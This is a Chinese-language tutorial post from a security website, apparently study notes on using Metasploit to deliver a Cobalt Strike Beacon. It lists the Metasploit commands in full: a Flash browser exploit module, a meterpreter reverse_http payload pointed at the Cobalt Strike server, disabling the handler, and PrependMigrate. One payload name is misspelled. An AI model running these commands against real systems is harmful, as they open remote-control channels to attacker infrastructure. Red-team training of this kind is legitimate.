1. 极安网首页
  2. 网络安全教程

CobaltStrike视频学习笔记系列:(九)Metasploit框架

CobaltStrike视频学习笔记系列:(九)Metasploit框架-极安网

0x00 客户端的漏洞利用

如果想使用MSF对目标进行漏洞利用,再通过这个漏洞来传输Beacon的话也可行。

1、首先在MSF上选择攻击模块

2、接着在MSF上设置Payload为windows/meterpreter/reverse_http或者windows/meterpreter/reverse_https,这么做是因为CS的Beacon与MSF的分阶段协议是相兼容的。

3、之后在MSF中设置Payload的LHOST、LPORT为CS中Beacon的监听器IP及端口。

4、然后设置 DisablePayloadHandler 为 True,此选项会让 MSF 避免在其内起一个 handler 来服务你的 payload 连接,也就是告诉MSF说我们已经建立了监听器,不必再新建监听器了。

5、再设置 PrependMigrate 为 True,此选项让 MSF 前置 shellcode 在另一个进程中运行 payload stager。如果被利用的应用程序崩溃或被用户关闭,这会帮助 Beacon 会话存活。

6、最后运行exploit -j,-j 是指作为job开始运行,即在后台运行。

0x01 操作

CS

在CS中新建一个HTTP Beacon,创建过程不再赘述,具体操作过程可参见之前第5节的学习笔记。

MSF

1、在MSF中选择攻击模块,根据教程这里选择的adobe_flash_hacking_team_uaf模块,不过个人感觉现在这个模块已经不太能被利用成功了。

  1. use exploit/multi/browser/adobe_flash_hacking_team_uaf

2、接着配置payload,这里选择revese_http payload

  1. set payload windows/meterpreter/revese_http
  2. set LHOST cs_server_ip
  3. set LPORT 80

3、之后,配置DisablePayloadHandler、PrependMigrate为 True

  1. set DisablePayloadHandler True
  2. set PrependMigrate True

4、最后,开始攻击。

  1. exploit -j

CobaltStrike视频学习笔记系列:(九)Metasploit框架-极安网

原创文章,作者: Admin ,转载请注明出处:https://secvery.com/516.html